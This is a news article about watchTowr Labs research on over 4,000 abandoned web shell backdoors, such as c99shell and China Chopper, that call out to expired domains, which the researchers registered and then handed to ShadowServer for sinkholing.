In a recent discovery by the watchTowr Labs team, over 4,000 unique backdoors have been found to be utilizing expired domains and abandoned infrastructure. These backdoors pose a significant threat as they expose government and academia-owned hosts, making them vulnerable to hijacking by malicious actors with nefarious intentions.
The watchTowr Labs team, in their latest research focusing on web shells, uncovered a concerning trend of attackers utilizing abandoned domain names to gain unauthorized access to systems. This method, dubbed “mass-hacking-on-autopilot” by watchTowr CEO Benjamin Harris, allows attackers to exploit existing vulnerabilities without the need for extensive effort.
Harris explained, “Imagine you want to gain access to thousands of systems, but don’t feel like investing the effort to identify and compromise systems yourself – or getting your hands dirty. Instead, you commandeer abandoned backdoors in regularly used backdoors to effectively ‘steal the spoils’ of someone else’s work.”
This technique allows attackers to gain access to compromised hosts, enabling them to extract sensitive data or launch further cyber attacks. The ease with which attackers can exploit abandoned backdoors highlights the importance of maintaining robust cybersecurity measures, even for seemingly inactive systems.
Furthermore, the watchTowr team’s research shed light on the prevalence of backdoored web shells, including popular variants like c99shell, r57shell, and China Chopper. These sophisticated web shells contain functions that facilitate unauthorized access and control, allowing attackers to manipulate compromised systems at will.
By registering over 40 domains and analyzing incoming requests, the researchers observed a significant number of compromised government-owned hosts and educational institutions across multiple countries. The discovery of breached systems in critical entities such as the Federal High Court of Nigeria underscores the severity of the situation.
In response to their findings, watchTowr took proactive steps to prevent further exploitation by transferring ownership of the identified domains to the ShadowServer Foundation for sinkholing. This collaborative effort aims to mitigate the potential risks posed by abandoned backdoors and protect vulnerable hosts from further compromise.
Harris described the research as a combination of “morbid curiosity” and a nostalgic look back at the cybersecurity landscape. The team’s vigilance in monitoring the compromised systems serves as a stark reminder of the ongoing threats faced by organizations and individuals in the evolving cybersecurity landscape.
As the cybersecurity industry continues to evolve, maintaining vigilance against emerging threats and vulnerabilities is crucial to safeguarding sensitive data and systems from malicious actors. The watchTowr Labs team’s research serves as a reminder of the importance of proactive cybersecurity measures in the face of evolving cyber threats.